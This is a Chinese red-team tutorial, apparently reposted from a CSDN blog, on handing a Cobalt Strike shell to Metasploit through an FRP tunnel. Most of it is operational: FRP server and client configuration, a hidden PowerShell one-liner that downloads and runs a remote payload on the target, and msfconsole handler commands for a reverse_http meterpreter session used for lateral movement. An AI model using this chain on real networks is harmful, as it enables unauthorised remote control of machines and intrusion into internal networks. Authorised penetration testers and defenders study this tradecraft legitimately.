msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frp将cs的shell派生到msf,满足内网渗透中的需求。
第一步:
首先我们连上cs后,我们需要去监听器修改参数。
我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。
第二步:
在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用方式以及命令不做介绍,需要了解百度即可。这里我们去修改frp.ini里面信息:vim frp.ini 端口随意,我们这里配置为7222端口。
我们启动它即可:./frps -c frps.ini
接下来我们去kali中去配置Frp客户端的frpc.ini文件,如下图配置
[common]
server_addr = 11.11.11.11(VPS地址)
server_port = 7222
[msf]
type = tcp
local_ip=127.0.0.1
local_port=1234
remote_port =1080
此时我们在kali中启动客户端
./frpc -c frpc.ini
第三步:
为了更方便演示本文要表达的重点,我们这就直接powershell上线为大家演示派生到msf的步骤。
直接生成powershell,去目标机器执行上线。
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.11.111:80/a’))”
第四步:
上线以后,我们就可以选择性看自己是否在内网渗透中,需要msf的帮助,然后可以利用FRP将cs的shell派生到msf中,实现联动了。
我们去kali启动msf,并做相应配置
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http //这里一定要用http
set LHOST 127.0.0.1 //这里是监听本地地址即可
set LPORT 1234 //端口需要跟前面frp配置的端口对应
run
set LPORT 1234这一块对应的端口就是前面配置frp时候的local_port=1234
然后我们就可以在msf中 run一下了
此时我们点击cs中的增加会话,当然我这里是中文的cs,英文原版中对应的是spawn
我们choose我们配置好的监听器选中点击即可
此时回到msf,稍微等一会meterpreter 就来了。
好了,现在就实现了cs的shell派生到msf上。可以愉快的通过msf横向了。
参考:
https://mp.weixin.qq.com/s/D_z4kmY2qvE6rw1yed-ZLg
总结:
1.为什么不多介绍一个msf派生到cs的方式?
因为实战中,渗透师傅们更喜欢用cs来操作,界面友好,所以本着一切以实际的攻防实战经验为主,故不介绍msf派生到cs的方式。
2.派生shell的方式不止一种,这里向大家演示的是本人平时最喜欢用的一种,也是个人认为最简单易懂的方式,总而言之,内网渗透的本质就是对机器的信息收集,所以要在转换攻击思路与方式中,也要注重收集时候的动静。
3.只会敲一些干货给大家,写作不易,喜欢转载加收藏即可,希望可以帮助大家在实战中应用起来。
欢迎大家关注个人公众号,本人致力于红队安全攻防的研究,每日分享技术干货,绝不水文,愿对你有所帮助!
标签:shell,派生,端口,frp,cs,msf 来源: https://blog.csdn.net/weixin_43939009/article/details/118277421
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。